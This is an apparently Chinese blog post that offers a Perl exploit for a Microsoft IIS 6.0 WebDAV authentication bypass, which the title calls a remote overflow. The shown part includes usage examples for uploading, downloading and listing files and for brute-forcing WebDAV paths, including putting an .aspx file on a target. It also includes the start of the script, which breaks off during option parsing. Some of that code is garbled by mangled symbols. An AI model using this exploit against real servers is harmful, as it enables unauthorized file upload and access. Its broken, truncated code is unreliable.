IIS 6.0 远程溢出漏洞

Oday摘要: 发布日期:2010-10.03发布作者:FoXHaCkEr影响版本:IIS6.0官方地址:Microsoft漏洞类型:远程溢出漏洞描述:微软IIS6.0一个远程溢出漏洞代码exp:#!/usr/bin/perl#*********!!!WARNING!!!*********#*FORSECURITYTESTiNGONLY!*#***********************************#

 

发布日期:2010-10.03
发布作者:FoX HaCkEr

影响版本:IIS 6.0
官方地址:Microsoft

漏洞类型:远程溢出

漏洞描述:微软IIS 6.0 一个远程溢出漏洞代码

exp: #!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
# v1.1 add brute force dir fuction.
# v1.0 download?upload and list dir.
#
# Usage:
# IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
# -target &nbs p; eg.: 192.168.1.1
# -port eg.: 80
# -method eg.: g
# (p:PUT,g:GET,l:LIST)
# -webdavpath eg.: webdav
# -BruteForcePath eg.: brute force webdav path
# -file (optional) eg.: test.aspx
# Example:
# put a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
# get a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
# list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
# brute force + list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
# brute force + get file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx

use IO::Socket;use Getopt::Long;

use threads;
use threads::shared;

# Globals Go Here.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # HTTP Method, PUT GET or .
my $xpath; # WebDAV path on Webserver.
my $bpath; # Bruteforce WebDAV path.
my $file; # file name.
my $httpmethod;
my $Host_Header; # The Host header has to be changed

GetOptions(
"target=s" ; => /$target,
"port=i" => /$port,
"method=s" => /$method,
"xpath=s" => /$xpath,
"bpath=s" => /$bpath,
"file=s" => /$file,
"help|?" => sub {
hello();
exit(0);

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值